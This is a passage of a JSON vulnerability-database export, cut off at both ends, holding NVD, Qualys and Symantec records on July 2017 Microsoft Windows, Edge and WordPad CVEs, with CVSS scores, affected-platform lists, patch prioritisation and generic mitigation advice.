["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8486", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an elevation of privilege vulnerability due to the way that the Windows Common Log File System (CLFS) driver handles objects in memory, aka \"Windows CLFS Elevation of Privilege Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, 
"privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8590", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8590"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8590", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8590", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Win32k in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, 
Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when it fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-8578, CVE-2017-8580, CVE-2017-8577, and CVE-2017-8467.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8581", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8581"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8581", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Graphics in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when it fails to properly handle objects in memory, aka \"Microsoft Graphics Component Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-8574 and CVE-2017-8556.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8573", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8573"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8573", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8573", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft WordPad in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows a remote code execution vulnerability due to the way it parses specially crafted files, aka \"WordPad Remote Code Execution Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8588", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8588"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8588", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8588", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Windows 1607, 1703, and Windows Server 2016 allows an elevation of privilege vulnerability due to Windows Input Method Editor (IME) improperly handling parameters in a method of a DCOM class, aka \"Windows IME Elevation of Privilege Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8566", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8566"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2017-8566", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8566", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2017-07-15T11:18:35", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8463"], "description": "Today Microsoft released patches covering 54 vulnerabilities as part of July\u2019s Patch Tuesday update, with 26 of them affecting Windows. Patches covering 19 of these vulnerabilities are labeled as Critical, all of which can result in Remote Code execution. According to Microsoft, none of these vulnerabilities are currently being exploited in the wild.\n\nTop priority for patching should go to [CVE-2017-8589](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589>), which is a vulnerability in the Windows Search service. This vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations. The issue affects Windows Server 2016, 2012, 2008 R2, 2008 as well as desktop systems like Windows 10, 7 and 8.1. While this vulnerability can leverage SMB as an attack vector, this is not a vulnerability in SMB itself, and is not related to the recent SMB vulnerabilities leveraged by EternalBlue, WannaCry, and Petya.\n\nFor Windows domain controllers, [CVE-2017-8563](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8563>) should also be considered for prioritization. While Microsoft categorizes the patches for this vulnerability as \"Important,\" it could be [leveraged in targeted attacks](<https://blog.preempt.com/new-ldap-rdp-relay-vulnerabilities-in-ntlm>) to elevate privileges and obtain administrative access to domain controllers. This is similar to other [known vulnerabilities](<http://www.darkreading.com/vulnerabilities---threats/sneaky-windows-folder-poisoning-attack-steals-access-rights/d/d-id/1251025>) in NTLM itself. 
Please note that this patch does require extra [configuration steps](<https://support.microsoft.com/en-us/help/4034879/how-to-add-the-ldapenforcechannelbinding-registry-entry>) to implement the added security.\n\nAside from [CVE-2017-8589](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589>), patching for workstations and multi-user systems should focus on [CVE-2017-8463](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8463>), which is a vulnerability in Windows Explorer, as well as multiple browser vulnerabilities in Internet Explorer and Edge. Exploitation of these vulnerabilities requires user interaction, but they can easily become targets for Exploit Kits.\n\nAdobe has also published security bulletin [APSB17-21](<https://helpx.adobe.com/security/products/flash-player/apsb17-21.html>), which provides patches covering three vulnerabilities and is labeled as critical. In addition to these patches, Microsoft has released an update to Adobe Flash for Windows 8.1, Windows 10, Windows Server 2012 and Windows Server 2016. Patching should focus on workstations and multi-user systems.\n\nToday\u2019s release is normal in size, and covers 54 vulnerabilities in Windows, Internet Explorer, Edge, Office, .NET Framework, Adobe Flash, and Exchange. 
Prioritization is based on current information available, and this blog will be updated if there are any additional changes to the threat landscape.", "modified": "2017-07-11T18:32:52", "published": "2017-07-11T18:32:52", "id": "QUALYSBLOG:1C37EC4D058873085167AA48C6A7233A", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2017/07/11/july-patch-tuesday-19-critical-vulnerabilities-from-microsoft-plus-critical-adobe-patches", "type": "qualysblog", "title": "July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-13T12:07:45", "bulletinFamily": "software", "cvelist": ["CVE-2017-8599"], "description": "### Description\n\nMicrosoft Edge is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99393", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99393", "type": "symantec", "title": "Microsoft Edge CVE-2017-8599 Security Bypass Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-14T22:40:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-8590"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. 
A local attacker can exploit this issue to run processes with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99427", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99427", "type": "symantec", "title": "Microsoft Windows CVE-2017-8590 Local Privilege Escalation Vulnerability", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-14T22:42:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-8588"], "description": "### Description\n\nMicrosoft Wordpad is prone to a remote code-execution vulnerability. Successfully exploiting this issue may result in the execution of arbitrary code in the context of the affected system. Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 
\n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99400", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99400", "type": "symantec", "title": "Microsoft Wordpad CVE-2017-8588 Remote Code Execution Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T20:41:36", "bulletinFamily": "software", "cvelist": ["CVE-2017-8603"], "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99406", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99406", "type": "symantec", "title": "Microsoft Edge CVE-2017-8603 Scripting Engine Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:58", "bulletinFamily": "software", "cvelist": ["CVE-2017-8566"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. 
A local attacker can exploit this issue to gain elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99404", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99404", "type": "symantec", "title": "Microsoft Windows CVE-2017-8566 Local Privilege Escalation Vulnerability", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-14T22:41:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-8463"], "description": "### Description\n\nMicrosoft Windows Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems R2 